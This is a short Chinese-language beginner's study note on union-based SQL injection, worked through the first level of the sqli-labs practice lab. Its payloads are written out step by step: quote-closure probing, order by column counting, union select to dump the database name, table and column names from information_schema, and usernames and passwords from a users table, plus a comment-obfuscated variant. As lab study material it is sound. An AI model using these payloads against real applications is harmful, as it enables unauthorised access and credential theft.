网络安全小白学习笔记p1

sql注入基础（以sqli-laps第一关为例）
1，判断参数类型：通过报错，掐头去尾
?id=1'和?id=1''等通过报错来判断是那种闭合方式，从而判断参数类型

显然是1'型
2，算表中列数：order by

可以判断出数据库是有3列的
然后我们需要知道页面所显示的name 和 password 属于数据库中的第几列
3，判断回显位置：union select

从显示结果可以看到，这里的name是第2列，password是第3列。
那么现在就可以从第2列或者第3列查询出数据库名称：
4，泄露部分信息：union select 1,database(),user()

现在知道了数据库名称,接下来查表
5，泄露表名：union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

6，泄露列名：union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+

7，查数据：?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
-1'//union//select//1,(select//group_concat(列)//from//表)